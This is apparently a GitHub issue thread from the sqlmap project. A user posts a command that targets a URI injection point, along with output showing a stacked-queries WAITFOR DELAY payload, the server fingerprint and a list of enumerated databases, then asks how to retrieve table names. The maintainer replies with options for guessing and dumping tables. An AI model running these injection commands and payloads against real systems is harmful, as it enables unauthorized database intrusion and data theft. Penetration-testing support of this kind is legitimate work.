### ISSUE TITLE
URI injection data and table names retrieve problem

### ISSUE THREAD

**Issue by cankaptan1976** [sqlmapproject/sqlmap#1622]
Hi Dear

Recently there is one problem with my test i can just received the database names but i could not receive table names used --parse-errors is there anyway to force for table names. ? My sqlmap is last version the query i used is down below

" ./sqlmap.py -u "http://www.pentestsite.com/Ana_Kategori/358*/Fifa_2016/" --dbs --batch --random-agent -D KRALIYET --tables --parse-errors "

sqlmap identified the following injection point(s) with a total of 166 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: http://www.pentestsite.com:80/Ana_Kategori/358;WAITFOR DELAY '0:0:5'--/Fifa_2016/
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2012
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: http://www.pentestsite.com:80/Ana_Kategori/358;WAITFOR DELAY '0:0:5'--/Fifa_2016/
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2012
available databases [7]:
[*] [tempdb\x03]
[*] KRALIYET
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: http://www.pentestsite.com:80/Ana_Kategori/358;WAITFOR DELAY '0:0:5'--/Fifa_2016/
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2012
available databases [7]:
[*] [tempdb]
[*] KRALIYET
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: http://www.pentestsite.com:80/Ana_Kategori/358;WAITFOR DELAY '0:0:5'--/Fifa_2016/
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2012
available databases [7]:
[*] [tempdb]
[*] KRALIYET
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB

Database: KRALIYET
[1 table]
+----+
| \t |
+----+

[19:16:38] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 177 times
[19:16:38] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.pentestsite.com'

**Comment by stamparm** [comment]
"is there anyway to force for table names" - you can always try to dump "guessed" table names like: `-T ... -D ... --dump`

Also, I would say that the system tables are restricted to you. In your cases most probably the fall-back method `DB_NAME()` has been used which doesn't require any special privileges.

All in all, you have a tricky situation where you'll need to either guess the identifier names (table and column names) or try to use `--common-tables`/`--common-columns` (**not recommended** in case of time-based/stacked SQLi)
